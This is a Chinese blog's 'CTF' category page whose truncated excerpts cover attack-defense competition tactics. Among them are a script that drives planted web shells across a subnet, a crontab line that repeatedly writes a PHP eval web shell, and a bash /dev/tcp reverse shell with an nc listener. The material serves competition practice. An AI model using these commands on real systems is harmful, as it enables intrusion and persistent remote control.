随笔分类 - CTF
摘要:#coding=utf-8 import requests url_head="http://10.1.10." #网段 url="" shell_addr="/public/.user_config.php" #木马路径 password="cmd" #木马密码 #port="80" payloa
阅读全文
摘要:*/2 * * * * /bin/echo '<?php eval(@$_POST['password']);?>' > /www/admin/localhost_80/wwwroot/DVWA-master/hackable/uploads/shell.php 1.使用命令crontab -e进入
阅读全文
摘要:1、nc反弹在靶机在执行 ,xx.xx.xx是你本机的ip地址bash -i >& /dev/tcp/xx.xx.xx/8000 0>&1在本机上执行nc -lvnp 8000就可以收到反弹过来的shell了2、nc采用base64编码反弹首先把这个语句进行base64编码,192.168.1.1是
阅读全文
摘要:1 #-*- coding:utf-8 -*- 2 import paramiko 3 import threading 4 import queue 5 6 #反弹shell python 7 q=queue.Queue() 8 #lock = threading.Lock() 9 10 #pri
阅读全文
摘要:#-*- coding:utf-8 -*- # coding:utf-8 import paramiko ip = '10.1.1.1' port = '22' username = 'ctf' passwd = 'ctf' #private_key_path = '/home/auto/.ssh/
阅读全文
摘要:# -*- coding: utf-8 -*- #use: python file_check.py ./ # 放在 /var/www/ 或 /var/www/html 下执行这个脚本,它会先备份当然目录下的所有文件,然后监控当前目录, # 一旦当前目录下的某个文件发生变更,就会自动还原,有新的文件
阅读全文
摘要:在Linux中,可以通过三种方式在一行中运行多个命令,外加一个管道操作命令:1 执行多个命令,前一个命令执行成功,才执行后一个命令。 在多个命令中使用 && 符号,主要用于多个命令之间,必须是前一个命令执行成功,接着才会执行后一个命令,不管命令有多少个都是按这种规则去执行的。 例如 cd proj
阅读全文
摘要:前阵子在准备AWD比赛,找了一些资料,基本都是网上的,做了简单的集合。可以做个 总结。 AWD基本资料 登录服务器: 攻击流程:信息搜集、网站目录扫描、攻击服务端口、攻击WEB服务、权限提升、权限维持 防御流程: 网站备份、数据库备份、信息搜集、 安全加固(更改口令,备份检查,后门查杀、关闭进程、关
阅读全文
摘要:web渗透中,常会用到的网站 网站导航 编码/加密CyberChef:编解码及加密,可本地部署 https://github.com/gchq/CyberChefOK Tools在线工具:https://github.com/wangyiwy/oktoolsCTF在线工具:http://www.hi
阅读全文
浙公网安备 33010602011771号